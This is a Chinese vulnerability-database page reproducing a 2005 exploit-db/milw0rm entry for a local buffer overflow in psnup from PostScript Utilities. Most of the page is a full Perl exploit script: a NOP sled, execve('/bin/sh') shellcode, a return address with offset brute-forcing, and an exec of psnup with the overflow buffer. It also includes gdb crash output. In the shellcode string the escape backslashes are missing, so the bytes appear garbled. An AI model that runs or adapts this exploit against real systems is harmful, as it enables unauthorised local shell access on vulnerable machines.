PostScript Utilities – ‘psnup’ Local Buffer Overflow

PostScript Utilities – ‘psnup’ Local Buffer Overflow

漏洞ID 1054973 漏洞类型
发布时间 2005-03-21 更新时间 2005-03-21
图片[1]-PostScript Utilities – ‘psnup’ Local Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-PostScript Utilities – ‘psnup’ Local Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/890
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

#         PostScript Utilities - psnup  (all the utilities of the package are vulnerable) *
#      						 	                                  *	
#           written by lammat just for practice purposes                                  *
#                       tested against psutils-p17                                        *
# (gdb) r -8 `perl -e 'print "A"x250'`                                                    *
# The program being debugged has been started already.                                    *
# Start it from the beginning? (y or n) y                                                 *
# Starting program: /usr/bin/psnup -8 `perl -e 'print "A"x250'`                           *
# (no debugging symbols found).../usr/bin/psnup: can't open input file                    *
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....                     *
#                                                                                         *
# Program received signal SIGSEGV, Segmentation fault.                                    *   
# 0x41414141 in ?? ()                                                                     *  

#  execve(/bin/sh) for linux x86
#   29 bytes
#   by Matias Sedalo


$shellcode = 
"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68".
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";

$len = 250;
$ret = 0xbffff3a0; 
$nop = "x90";
$oops="/usr/bin/psnup";
$offset = 900; 

# offset bruteforce purposes below
if (@ARGV == 1) {
    $offset = $ARGV[0];}

for ($i=0; $i<($len-length($shellcode)-100);$i++)
	{$buffer .= $nop;
}

$buffer .= $shellcode;

print ("Address: 0x",sprintf('%lx',($ret + $offset)),"n");

$new_ret = pack('l',($ret + $offset));

until(length($buffer)==$len)
{
$buffer.=$new_ret;
}
exec("$oops -8 $buffer");

# milw0rm.com [2005-03-21]

相关推荐: LocalWEB2000 Directory Traversal Vulnerability

LocalWEB2000 Directory Traversal Vulnerability 漏洞ID 1103476 漏洞类型 Input Validation Error 发布时间 2001-01-22 更新时间 2001-01-22 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享